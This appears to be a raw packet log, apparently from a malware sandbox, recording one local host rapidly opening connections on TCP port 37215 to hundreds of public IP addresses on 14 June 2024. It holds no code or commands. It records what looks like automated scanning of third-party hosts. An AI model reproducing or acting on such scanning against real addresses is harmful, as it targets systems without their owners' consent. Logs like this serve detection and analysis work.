                                            Jun 14, 2024 10:43:39.928153038 CEST3721547698197.133.122.60192.168.2.14
                                            Jun 14, 2024 10:43:39.928165913 CEST5318237215192.168.2.1441.210.22.93
                                            Jun 14, 2024 10:43:39.928180933 CEST3451837215192.168.2.1441.53.143.0
                                            Jun 14, 2024 10:43:39.928183079 CEST4769837215192.168.2.14197.133.122.60
                                            Jun 14, 2024 10:43:39.928451061 CEST372153552641.63.115.65192.168.2.14
                                            Jun 14, 2024 10:43:39.928459883 CEST3721560304197.199.147.250192.168.2.14
                                            Jun 14, 2024 10:43:39.928467989 CEST3721550540156.138.108.172192.168.2.14
                                            Jun 14, 2024 10:43:39.928474903 CEST3552637215192.168.2.1441.63.115.65
                                            Jun 14, 2024 10:43:39.928495884 CEST5054037215192.168.2.14156.138.108.172
                                            Jun 14, 2024 10:43:39.928498030 CEST6030437215192.168.2.14197.199.147.250
                                            Jun 14, 2024 10:43:39.928818941 CEST3721550372156.239.198.140192.168.2.14
                                            Jun 14, 2024 10:43:39.928828001 CEST3721545264197.178.214.214192.168.2.14
                                            Jun 14, 2024 10:43:39.928855896 CEST5037237215192.168.2.14156.239.198.140
                                            Jun 14, 2024 10:43:39.928858995 CEST4526437215192.168.2.14197.178.214.214
                                            Jun 14, 2024 10:43:39.929133892 CEST372155499441.50.29.253192.168.2.14
                                            Jun 14, 2024 10:43:39.929141998 CEST3721535478197.104.47.130192.168.2.14
                                            Jun 14, 2024 10:43:39.929150105 CEST3721536192156.183.127.88192.168.2.14
                                            Jun 14, 2024 10:43:39.929167032 CEST3721559480156.91.246.73192.168.2.14
                                            Jun 14, 2024 10:43:39.929172993 CEST5499437215192.168.2.1441.50.29.253
                                            Jun 14, 2024 10:43:39.929172993 CEST3619237215192.168.2.14156.183.127.88
                                            Jun 14, 2024 10:43:39.929174900 CEST3547837215192.168.2.14197.104.47.130
                                            Jun 14, 2024 10:43:39.929219007 CEST5948037215192.168.2.14156.91.246.73
                                            Jun 14, 2024 10:43:39.929225922 CEST3721556148156.229.95.39192.168.2.14
                                            Jun 14, 2024 10:43:39.929260969 CEST5614837215192.168.2.14156.229.95.39
                                            Jun 14, 2024 10:43:39.929398060 CEST372153615241.129.238.136192.168.2.14
                                            Jun 14, 2024 10:43:39.929434061 CEST3615237215192.168.2.1441.129.238.136
                                            Jun 14, 2024 10:43:39.929502010 CEST3721554426197.19.80.99192.168.2.14
                                            Jun 14, 2024 10:43:39.929511070 CEST372156004441.139.209.46192.168.2.14
                                            Jun 14, 2024 10:43:39.929539919 CEST5442637215192.168.2.14197.19.80.99
                                            Jun 14, 2024 10:43:39.929546118 CEST6004437215192.168.2.1441.139.209.46
                                            Jun 14, 2024 10:43:39.929577112 CEST3721559440156.162.139.157192.168.2.14
                                            Jun 14, 2024 10:43:39.929616928 CEST5944037215192.168.2.14156.162.139.157
                                            Jun 14, 2024 10:43:39.929698944 CEST3721547362156.117.51.135192.168.2.14
                                            Jun 14, 2024 10:43:39.929733992 CEST4736237215192.168.2.14156.117.51.135
                                            Jun 14, 2024 10:43:39.929847002 CEST3721550970156.0.58.74192.168.2.14
                                            Jun 14, 2024 10:43:39.929882050 CEST5097037215192.168.2.14156.0.58.74
                                            Jun 14, 2024 10:43:39.930104017 CEST3721538508197.45.159.107192.168.2.14
                                            Jun 14, 2024 10:43:39.930136919 CEST3850837215192.168.2.14197.45.159.107
                                            Jun 14, 2024 10:43:39.930747032 CEST372154439441.221.11.44192.168.2.14
                                            Jun 14, 2024 10:43:39.930778027 CEST4439437215192.168.2.1441.221.11.44
                                            Jun 14, 2024 10:43:39.930871010 CEST372153640441.156.151.91192.168.2.14
                                            Jun 14, 2024 10:43:39.930913925 CEST3640437215192.168.2.1441.156.151.91
                                            Jun 14, 2024 10:43:39.931199074 CEST3721541788197.143.19.164192.168.2.14
                                            Jun 14, 2024 10:43:39.931233883 CEST4178837215192.168.2.14197.143.19.164
                                            Jun 14, 2024 10:43:39.931452036 CEST3721547162156.61.37.74192.168.2.14
                                            Jun 14, 2024 10:43:39.931488037 CEST4716237215192.168.2.14156.61.37.74
                                            Jun 14, 2024 10:43:39.931750059 CEST372154649841.160.145.89192.168.2.14
                                            Jun 14, 2024 10:43:39.931787968 CEST4649837215192.168.2.1441.160.145.89
                                            Jun 14, 2024 10:43:39.932234049 CEST372154409241.193.116.162192.168.2.14
                                            Jun 14, 2024 10:43:39.932271004 CEST4409237215192.168.2.1441.193.116.162
                                            Jun 14, 2024 10:43:39.932777882 CEST372153744441.72.184.109192.168.2.14
                                            Jun 14, 2024 10:43:39.932895899 CEST3744437215192.168.2.1441.72.184.109
                                            Jun 14, 2024 10:43:39.933125973 CEST3721539236197.131.143.27192.168.2.14
                                            Jun 14, 2024 10:43:39.933161974 CEST3923637215192.168.2.14197.131.143.27
                                            Jun 14, 2024 10:43:39.933299065 CEST3721554222197.102.175.56192.168.2.14
                                            Jun 14, 2024 10:43:39.933334112 CEST5422237215192.168.2.14197.102.175.56
                                            Jun 14, 2024 10:43:39.933618069 CEST3721555742156.137.254.152192.168.2.14
                                            Jun 14, 2024 10:43:39.933655977 CEST5574237215192.168.2.14156.137.254.152
                                            Jun 14, 2024 10:43:40.825851917 CEST661137215192.168.2.1441.117.215.153
                                            Jun 14, 2024 10:43:40.825854063 CEST661137215192.168.2.1441.208.18.167
                                            Jun 14, 2024 10:43:40.825911999 CEST661137215192.168.2.14156.211.202.95
                                            Jun 14, 2024 10:43:40.825911045 CEST661137215192.168.2.14197.115.206.145
                                            Jun 14, 2024 10:43:40.825913906 CEST661137215192.168.2.1441.204.119.255
                                            Jun 14, 2024 10:43:40.825913906 CEST661137215192.168.2.14156.77.120.44
                                            Jun 14, 2024 10:43:40.825913906 CEST661137215192.168.2.1441.7.213.46
                                            Jun 14, 2024 10:43:40.825915098 CEST661137215192.168.2.14156.178.97.126
                                            Jun 14, 2024 10:43:40.825917006 CEST661137215192.168.2.14197.69.99.166
                                            Jun 14, 2024 10:43:40.825915098 CEST661137215192.168.2.14197.221.114.154
                                            Jun 14, 2024 10:43:40.825918913 CEST661137215192.168.2.1441.236.178.242
                                            Jun 14, 2024 10:43:40.825916052 CEST661137215192.168.2.14197.105.185.234
                                            Jun 14, 2024 10:43:40.825921059 CEST661137215192.168.2.14156.92.102.202
                                            Jun 14, 2024 10:43:40.825921059 CEST661137215192.168.2.1441.141.32.32
                                            Jun 14, 2024 10:43:40.825918913 CEST661137215192.168.2.14197.197.35.65
                                            Jun 14, 2024 10:43:40.825921059 CEST661137215192.168.2.14156.24.7.74
                                            Jun 14, 2024 10:43:40.825921059 CEST661137215192.168.2.14197.81.94.253
                                            Jun 14, 2024 10:43:40.825921059 CEST661137215192.168.2.14197.84.144.33
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.1441.201.39.196
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.1441.187.117.105
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.14197.12.252.127
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.14197.28.230.71
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.14156.2.146.186
                                            Jun 14, 2024 10:43:40.826005936 CEST661137215192.168.2.14197.55.73.26
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14197.164.6.148
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.1441.30.5.248
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14197.174.4.170
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.1441.191.23.253
                                            Jun 14, 2024 10:43:40.826011896 CEST661137215192.168.2.14156.30.181.100
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14156.99.116.246
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.1441.2.252.238
                                            Jun 14, 2024 10:43:40.826011896 CEST661137215192.168.2.1441.2.173.196
                                            Jun 14, 2024 10:43:40.826011896 CEST661137215192.168.2.1441.249.153.240
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.1441.22.208.78
                                            Jun 14, 2024 10:43:40.826013088 CEST661137215192.168.2.1441.57.51.43
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14197.158.225.203
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.14156.124.119.79
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14156.78.200.17
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.14197.233.17.165
                                            Jun 14, 2024 10:43:40.826011896 CEST661137215192.168.2.1441.65.19.114
                                            Jun 14, 2024 10:43:40.826013088 CEST661137215192.168.2.14197.101.193.39
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.1441.201.211.176
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14156.59.32.240
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.14197.245.52.8
                                            Jun 14, 2024 10:43:40.826013088 CEST661137215192.168.2.14197.52.236.152
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.14156.174.243.7
                                            Jun 14, 2024 10:43:40.826011896 CEST661137215192.168.2.1441.173.185.79
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.1441.159.22.203
                                            Jun 14, 2024 10:43:40.826013088 CEST661137215192.168.2.14156.195.146.2
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.1441.255.10.162
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.14156.255.221.226
                                            Jun 14, 2024 10:43:40.826010942 CEST661137215192.168.2.14156.40.207.143
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.1441.5.179.179
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.14197.14.135.216
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.1441.5.202.197
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.1441.216.89.149
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.1441.18.12.5
                                            Jun 14, 2024 10:43:40.826014996 CEST661137215192.168.2.1441.16.169.33
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.14156.39.180.25
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.14197.108.169.253
                                            Jun 14, 2024 10:43:40.826016903 CEST661137215192.168.2.14197.211.172.30
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.1441.250.74.98
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.1441.253.161.151
                                            Jun 14, 2024 10:43:40.826026917 CEST661137215192.168.2.14156.80.22.52
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.14156.235.60.2
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.14197.185.51.48
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.14156.76.123.118
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.14156.65.80.241
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.14156.187.105.241
                                            Jun 14, 2024 10:43:40.826103926 CEST661137215192.168.2.1441.154.231.20
                                            Jun 14, 2024 10:43:40.826105118 CEST661137215192.168.2.14197.173.38.24
                                            Jun 14, 2024 10:43:40.826105118 CEST661137215192.168.2.14156.218.2.40
                                            Jun 14, 2024 10:43:40.826116085 CEST661137215192.168.2.1441.149.178.213
                                            Jun 14, 2024 10:43:40.826116085 CEST661137215192.168.2.14197.64.244.2
                                            Jun 14, 2024 10:43:40.826117039 CEST661137215192.168.2.14156.48.112.59
                                            Jun 14, 2024 10:43:40.826117039 CEST661137215192.168.2.14197.117.74.16
                                            Jun 14, 2024 10:43:40.826117039 CEST661137215192.168.2.14197.132.132.236
                                            Jun 14, 2024 10:43:40.826134920 CEST661137215192.168.2.14156.130.112.214
                                            Jun 14, 2024 10:43:40.826134920 CEST661137215192.168.2.1441.230.212.237
                                            Jun 14, 2024 10:43:40.826134920 CEST661137215192.168.2.14156.200.186.99
                                            Jun 14, 2024 10:43:40.826136112 CEST661137215192.168.2.14156.131.104.9
                                            Jun 14, 2024 10:43:40.826137066 CEST661137215192.168.2.14156.29.42.180
                                            Jun 14, 2024 10:43:40.826136112 CEST661137215192.168.2.14197.60.87.19
                                            Jun 14, 2024 10:43:40.826137066 CEST661137215192.168.2.14156.53.174.60
                                            Jun 14, 2024 10:43:40.826136112 CEST661137215192.168.2.1441.31.222.132
                                            Jun 14, 2024 10:43:40.826137066 CEST661137215192.168.2.14197.34.129.85
                                            Jun 14, 2024 10:43:40.826136112 CEST661137215192.168.2.1441.25.141.131
                                            Jun 14, 2024 10:43:40.826137066 CEST661137215192.168.2.14197.163.86.33
                                            Jun 14, 2024 10:43:40.826136112 CEST661137215192.168.2.1441.178.3.57
                                            Jun 14, 2024 10:43:40.826145887 CEST661137215192.168.2.14156.178.127.53
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14156.162.167.145
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.207.12.125
                                            Jun 14, 2024 10:43:40.826148987 CEST661137215192.168.2.1441.99.18.70
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.1441.251.54.239
                                            Jun 14, 2024 10:43:40.826149940 CEST661137215192.168.2.14197.36.39.45
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.1441.31.131.18
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.93.197.167
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14156.39.27.172
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.115.149.12
                                            Jun 14, 2024 10:43:40.826149940 CEST661137215192.168.2.14197.127.207.155
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.67.213.250
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.55.190.177
                                            Jun 14, 2024 10:43:40.826149940 CEST661137215192.168.2.1441.254.243.150
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14156.58.23.199
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.1441.229.65.243
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.36.168.96
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.1441.105.248.161
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14156.198.9.13
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.14156.77.171.85
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.1441.77.212.152
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.178.164.7
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.1441.65.51.58
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.14197.94.33.146
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.14197.52.64.141
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.14156.98.207.57
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.14197.151.161.254
                                            Jun 14, 2024 10:43:40.826148033 CEST661137215192.168.2.1441.199.176.221
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.14156.22.246.78
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.1441.217.229.115
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.14156.129.8.36
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.1441.134.99.108
                                            Jun 14, 2024 10:43:40.826158047 CEST661137215192.168.2.14156.3.252.137
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.14197.159.142.182
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.14197.85.208.58
                                            Jun 14, 2024 10:43:40.826155901 CEST661137215192.168.2.14197.26.194.149
                                            Jun 14, 2024 10:43:40.826157093 CEST661137215192.168.2.1441.95.206.248
                                            Jun 14, 2024 10:43:40.826174021 CEST661137215192.168.2.14156.82.174.117
                                            Jun 14, 2024 10:43:40.826174021 CEST661137215192.168.2.1441.130.196.14
                                            Jun 14, 2024 10:43:40.826174021 CEST661137215192.168.2.1441.136.10.6
                                            Jun 14, 2024 10:43:40.826196909 CEST661137215192.168.2.1441.145.16.189
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.14197.34.251.4
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.1441.128.253.23
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.1441.182.176.161
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.14197.157.11.63
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.14197.254.137.241
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.1441.188.209.121
                                            Jun 14, 2024 10:43:40.826222897 CEST661137215192.168.2.1441.26.203.87
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.1441.73.56.181
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.14197.160.183.210
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.14197.75.132.120
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.1441.140.138.167
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.14197.254.147.68
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.1441.108.71.49
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.1441.66.184.204
                                            Jun 14, 2024 10:43:40.826226950 CEST661137215192.168.2.14197.10.112.157
                                            Jun 14, 2024 10:43:40.826240063 CEST661137215192.168.2.1441.41.210.201
                                            Jun 14, 2024 10:43:40.826240063 CEST661137215192.168.2.14197.57.87.250
                                            Jun 14, 2024 10:43:40.826240063 CEST661137215192.168.2.14197.89.94.17
                                            Jun 14, 2024 10:43:40.826240063 CEST661137215192.168.2.14156.94.166.221
                                            Jun 14, 2024 10:43:40.826241970 CEST661137215192.168.2.1441.57.147.240
                                            Jun 14, 2024 10:43:40.826240063 CEST661137215192.168.2.14156.106.122.7
                                            Jun 14, 2024 10:43:40.826241970 CEST661137215192.168.2.14156.34.62.230
                                            Jun 14, 2024 10:43:40.826241016 CEST661137215192.168.2.14156.3.135.252
                                            Jun 14, 2024 10:43:40.826241970 CEST661137215192.168.2.14197.105.101.248
                                            Jun 14, 2024 10:43:40.826241016 CEST661137215192.168.2.14197.248.137.205
                                            Jun 14, 2024 10:43:40.826241970 CEST661137215192.168.2.14197.187.159.134
                                            Jun 14, 2024 10:43:40.826270103 CEST661137215192.168.2.1441.198.60.157
                                            Jun 14, 2024 10:43:40.826270103 CEST661137215192.168.2.14156.186.251.254
                                            Jun 14, 2024 10:43:40.826270103 CEST661137215192.168.2.14156.218.178.89
                                            Jun 14, 2024 10:43:40.826270103 CEST661137215192.168.2.14197.217.192.190
                                            Jun 14, 2024 10:43:40.831517935 CEST37215661141.117.215.153192.168.2.14
                                            Jun 14, 2024 10:43:40.831532955 CEST37215661141.208.18.167192.168.2.14
                                            Jun 14, 2024 10:43:40.831541061 CEST372156611156.211.202.95192.168.2.14
                                            Jun 14, 2024 10:43:40.831598043 CEST37215661141.204.119.255192.168.2.14
                                            Jun 14, 2024 10:43:40.831605911 CEST661137215192.168.2.1441.117.215.153
                                            Jun 14, 2024 10:43:40.831607103 CEST372156611156.77.120.44192.168.2.14
                                            Jun 14, 2024 10:43:40.831607103 CEST661137215192.168.2.1441.208.18.167
                                            Jun 14, 2024 10:43:40.831607103 CEST661137215192.168.2.14156.211.202.95
                                            Jun 14, 2024 10:43:40.831618071 CEST37215661141.7.213.46192.168.2.14
                                            Jun 14, 2024 10:43:40.831626892 CEST372156611156.178.97.126192.168.2.14
                                            Jun 14, 2024 10:43:40.831634998 CEST372156611197.69.99.166192.168.2.14
                                            Jun 14, 2024 10:43:40.831644058 CEST372156611197.115.206.145192.168.2.14
                                            Jun 14, 2024 10:43:40.831653118 CEST372156611156.92.102.202192.168.2.14
                                            Jun 14, 2024 10:43:40.831655979 CEST661137215192.168.2.1441.204.119.255
                                            Jun 14, 2024 10:43:40.831655979 CEST661137215192.168.2.14156.77.120.44
                                            Jun 14, 2024 10:43:40.831655979 CEST661137215192.168.2.1441.7.213.46
                                            Jun 14, 2024 10:43:40.831655979 CEST661137215192.168.2.14156.178.97.126
                                            Jun 14, 2024 10:43:40.831660032 CEST37215661141.236.178.242192.168.2.14
                                            Jun 14, 2024 10:43:40.831667900 CEST661137215192.168.2.14197.69.99.166
                                            Jun 14, 2024 10:43:40.831671000 CEST372156611197.221.114.154192.168.2.14
                                            Jun 14, 2024 10:43:40.831681013 CEST372156611197.197.35.65192.168.2.14
                                            Jun 14, 2024 10:43:40.831686020 CEST661137215192.168.2.14197.115.206.145
                                            Jun 14, 2024 10:43:40.831688881 CEST661137215192.168.2.14156.92.102.202
                                            Jun 14, 2024 10:43:40.831691027 CEST372156611197.105.185.234192.168.2.14
                                            Jun 14, 2024 10:43:40.831698895 CEST37215661141.141.32.32192.168.2.14
                                            Jun 14, 2024 10:43:40.831705093 CEST661137215192.168.2.1441.236.178.242
                                            Jun 14, 2024 10:43:40.831706047 CEST661137215192.168.2.14197.221.114.154
                                            Jun 14, 2024 10:43:40.831707001 CEST372156611156.24.7.74192.168.2.14
                                            Jun 14, 2024 10:43:40.831721067 CEST372156611197.81.94.253192.168.2.14
                                            Jun 14, 2024 10:43:40.831727028 CEST661137215192.168.2.14197.197.35.65
                                            Jun 14, 2024 10:43:40.831728935 CEST372156611197.84.144.33192.168.2.14
                                            Jun 14, 2024 10:43:40.831732035 CEST661137215192.168.2.14197.105.185.234
                                            Jun 14, 2024 10:43:40.831733942 CEST661137215192.168.2.1441.141.32.32
                                            Jun 14, 2024 10:43:40.831738949 CEST37215661141.201.39.196192.168.2.14
                                            Jun 14, 2024 10:43:40.831742048 CEST661137215192.168.2.14156.24.7.74
                                            Jun 14, 2024 10:43:40.831747055 CEST37215661141.187.117.105192.168.2.14
                                            Jun 14, 2024 10:43:40.831748962 CEST661137215192.168.2.14197.81.94.253
                                            Jun 14, 2024 10:43:40.831754923 CEST372156611197.164.6.148192.168.2.14
                                            Jun 14, 2024 10:43:40.831763029 CEST372156611197.12.252.127192.168.2.14
                                            Jun 14, 2024 10:43:40.831768036 CEST661137215192.168.2.1441.201.39.196
                                            Jun 14, 2024 10:43:40.831770897 CEST372156611197.28.230.71192.168.2.14
                                            Jun 14, 2024 10:43:40.831779003 CEST37215661141.30.5.248192.168.2.14
                                            Jun 14, 2024 10:43:40.831779957 CEST661137215192.168.2.14197.84.144.33
                                            Jun 14, 2024 10:43:40.831784964 CEST661137215192.168.2.1441.187.117.105
                                            Jun 14, 2024 10:43:40.831789017 CEST661137215192.168.2.14197.164.6.148
                                            Jun 14, 2024 10:43:40.831794977 CEST661137215192.168.2.14197.12.252.127
                                            Jun 14, 2024 10:43:40.831794977 CEST661137215192.168.2.14197.28.230.71
                                            Jun 14, 2024 10:43:40.831815958 CEST661137215192.168.2.1441.30.5.248
                                            Jun 14, 2024 10:43:40.832035065 CEST372156611156.2.146.186192.168.2.14
                                            Jun 14, 2024 10:43:40.832042933 CEST372156611197.55.73.26192.168.2.14
                                            Jun 14, 2024 10:43:40.832051039 CEST37215661141.191.23.253192.168.2.14
                                            Jun 14, 2024 10:43:40.832060099 CEST372156611156.99.116.246192.168.2.14
                                            Jun 14, 2024 10:43:40.832067966 CEST372156611156.30.181.100192.168.2.14
                                            Jun 14, 2024 10:43:40.832072020 CEST661137215192.168.2.14156.2.146.186
                                            Jun 14, 2024 10:43:40.832072020 CEST661137215192.168.2.14197.55.73.26
                                            Jun 14, 2024 10:43:40.832076073 CEST37215661141.2.173.196192.168.2.14
                                            Jun 14, 2024 10:43:40.832083941 CEST37215661141.249.153.240192.168.2.14
                                            Jun 14, 2024 10:43:40.832093000 CEST37215661141.57.51.43192.168.2.14
                                            Jun 14, 2024 10:43:40.832096100 CEST661137215192.168.2.1441.191.23.253
                                            Jun 14, 2024 10:43:40.832096100 CEST661137215192.168.2.14156.99.116.246
                                            Jun 14, 2024 10:43:40.832099915 CEST37215661141.65.19.114192.168.2.14
                                            Jun 14, 2024 10:43:40.832106113 CEST661137215192.168.2.1441.2.173.196
                                            Jun 14, 2024 10:43:40.832108974 CEST372156611197.101.193.39192.168.2.14
                                            Jun 14, 2024 10:43:40.832113028 CEST661137215192.168.2.14156.30.181.100
                                            Jun 14, 2024 10:43:40.832113028 CEST661137215192.168.2.1441.249.153.240
                                            Jun 14, 2024 10:43:40.832118988 CEST37215661141.173.185.79192.168.2.14
                                            Jun 14, 2024 10:43:40.832122087 CEST661137215192.168.2.1441.57.51.43
                                            Jun 14, 2024 10:43:40.832127094 CEST661137215192.168.2.1441.65.19.114
                                            Jun 14, 2024 10:43:40.832127094 CEST372156611197.52.236.152192.168.2.14
                                            Jun 14, 2024 10:43:40.832138062 CEST372156611197.174.4.170192.168.2.14
                                            Jun 14, 2024 10:43:40.832145929 CEST372156611156.195.146.2192.168.2.14
                                            Jun 14, 2024 10:43:40.832148075 CEST661137215192.168.2.14197.101.193.39
                                            Jun 14, 2024 10:43:40.832151890 CEST661137215192.168.2.1441.173.185.79
                                            Jun 14, 2024 10:43:40.832154989 CEST37215661141.2.252.238192.168.2.14
                                            Jun 14, 2024 10:43:40.832158089 CEST661137215192.168.2.14197.52.236.152
                                            Jun 14, 2024 10:43:40.832164049 CEST372156611197.233.17.165192.168.2.14
                                            Jun 14, 2024 10:43:40.832170963 CEST661137215192.168.2.14156.195.146.2
                                            Jun 14, 2024 10:43:40.832173109 CEST661137215192.168.2.14197.174.4.170
                                            Jun 14, 2024 10:43:40.832173109 CEST372156611156.124.119.79192.168.2.14
                                            Jun 14, 2024 10:43:40.832184076 CEST37215661141.22.208.78192.168.2.14
                                            Jun 14, 2024 10:43:40.832191944 CEST37215661141.201.211.176192.168.2.14
                                            Jun 14, 2024 10:43:40.832192898 CEST661137215192.168.2.1441.2.252.238
                                            Jun 14, 2024 10:43:40.832194090 CEST661137215192.168.2.14197.233.17.165
                                            Jun 14, 2024 10:43:40.832200050 CEST372156611197.158.225.203192.168.2.14
                                            Jun 14, 2024 10:43:40.832206964 CEST661137215192.168.2.14156.124.119.79
                                            Jun 14, 2024 10:43:40.832209110 CEST372156611197.245.52.8192.168.2.14
                                            Jun 14, 2024 10:43:40.832218885 CEST661137215192.168.2.1441.201.211.176
                                            Jun 14, 2024 10:43:40.832220078 CEST372156611156.78.200.17192.168.2.14
                                            Jun 14, 2024 10:43:40.832221031 CEST661137215192.168.2.1441.22.208.78
                                            Jun 14, 2024 10:43:40.832231998 CEST661137215192.168.2.14197.158.225.203
                                            Jun 14, 2024 10:43:40.832247972 CEST661137215192.168.2.14197.245.52.8
                                            Jun 14, 2024 10:43:40.832252026 CEST661137215192.168.2.14156.78.200.17
                                            Jun 14, 2024 10:43:40.832649946 CEST372156611156.174.243.7192.168.2.14
                                            Jun 14, 2024 10:43:40.832665920 CEST37215661141.159.22.203192.168.2.14
                                            Jun 14, 2024 10:43:40.832674980 CEST372156611156.255.221.226192.168.2.14
                                            Jun 14, 2024 10:43:40.832685947 CEST661137215192.168.2.1441.159.22.203
                                            Jun 14, 2024 10:43:40.832689047 CEST661137215192.168.2.14156.174.243.7
                                            Jun 14, 2024 10:43:40.832689047 CEST37215661141.255.10.162192.168.2.14
                                            Jun 14, 2024 10:43:40.832700014 CEST37215661141.5.179.179192.168.2.14
                                            Jun 14, 2024 10:43:40.832700014 CEST661137215192.168.2.14156.255.221.226
                                            Jun 14, 2024 10:43:40.832709074 CEST37215661141.216.89.149192.168.2.14
                                            Jun 14, 2024 10:43:40.832717896 CEST372156611197.14.135.216192.168.2.14
                                            Jun 14, 2024 10:43:40.832719088 CEST661137215192.168.2.1441.255.10.162
                                            Jun 14, 2024 10:43:40.832726955 CEST372156611197.108.169.253192.168.2.14
                                            Jun 14, 2024 10:43:40.832735062 CEST37215661141.5.202.197192.168.2.14
                                            Jun 14, 2024 10:43:40.832735062 CEST661137215192.168.2.1441.216.89.149
                                            Jun 14, 2024 10:43:40.832736015 CEST661137215192.168.2.1441.5.179.179
                                            Jun 14, 2024 10:43:40.832745075 CEST37215661141.250.74.98192.168.2.14
                                            Jun 14, 2024 10:43:40.832752943 CEST661137215192.168.2.14197.14.135.216
                                            Jun 14, 2024 10:43:40.832755089 CEST37215661141.16.169.33192.168.2.14
                                            Jun 14, 2024 10:43:40.832755089 CEST661137215192.168.2.14197.108.169.253
                                            Jun 14, 2024 10:43:40.832762003 CEST37215661141.18.12.5192.168.2.14
                                            Jun 14, 2024 10:43:40.832767963 CEST661137215192.168.2.1441.5.202.197
                                            Jun 14, 2024 10:43:40.832770109 CEST37215661141.253.161.151192.168.2.14
                                            Jun 14, 2024 10:43:40.832778931 CEST372156611156.39.180.25192.168.2.14
                                            Jun 14, 2024 10:43:40.832779884 CEST661137215192.168.2.1441.250.74.98
                                            Jun 14, 2024 10:43:40.832787991 CEST372156611156.80.22.52192.168.2.14
                                            Jun 14, 2024 10:43:40.832789898 CEST661137215192.168.2.1441.16.169.33
                                            Jun 14, 2024 10:43:40.832794905 CEST661137215192.168.2.1441.253.161.151
                                            Jun 14, 2024 10:43:40.832796097 CEST372156611197.211.172.30192.168.2.14
                                            Jun 14, 2024 10:43:40.832799911 CEST661137215192.168.2.1441.18.12.5
